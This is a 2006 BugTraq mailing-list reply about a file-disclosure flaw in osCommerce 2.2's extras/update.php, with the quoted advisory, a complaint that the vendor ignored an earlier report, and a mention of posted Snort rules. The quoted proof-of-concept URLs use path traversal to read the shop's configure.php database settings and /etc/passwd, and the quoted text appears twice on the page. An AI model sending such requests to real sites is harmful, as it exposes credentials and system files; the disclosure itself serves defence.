BugTraq
Back to list
|
Post reply
RE: osCommerce "extras/" information/source code disclosure
Apr 15 2006 12:39PM
Michael Scheidell (scheidell secnap net)
> -----Original Message-----
> From: rgod (at) autistici (dot) org [email concealed] [mailto:rgod (at) autistici (dot) org [email concealed]]
> Sent: Friday, April 14, 2006 7:20 AM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: osCommerce "extras/" information/source code disclosure
>
>
> ---- osCommerce <= 2.2 "extras/" information/source code
> disclosure ------------
>
> software site: http://www.oscommerce.com/
>
>
> if extras/ folder is placed inside the www path, you can see
> all files on target system, including php source code with
> database details, poc:
>
http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalo
g/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/pass
wd
Amazing: this was reported to oscommerce almost a year ago by andiroo
blat gmail, and they didn't do anything about it?
http://sourceforge.net/mailarchive/message.php?msg_id=12318248
http://www.oscommerce.com/community/bugs,2835
For you snorters, rules have been posted to snort-sigs and bleeding
mailing list.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
> From: rgod (at) autistici (dot) org [email concealed] [mailto:rgod (at) autistici (dot) org [email concealed]]
> Sent: Friday, April 14, 2006 7:20 AM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: osCommerce "extras/" information/source code disclosure
>
>
> ---- osCommerce <= 2.2 "extras/" information/source code
> disclosure ------------
>
> software site: http://www.oscommerce.com/
>
>
> if extras/ folder is placed inside the www path, you can see
> all files on target system, including php source code with
> database details, poc:
>
http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalo
g/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/pass
wd
Amazing: this was reported to oscommerce almost a year ago by andiroo
blat gmail, and they didn't do anything about it?
http://sourceforge.net/mailarchive/message.php?msg_id=12318248
http://www.oscommerce.com/community/bugs,2835
For you snorters, rules have been posted to snort-sigs and bleeding
mailing list.
[ reply ]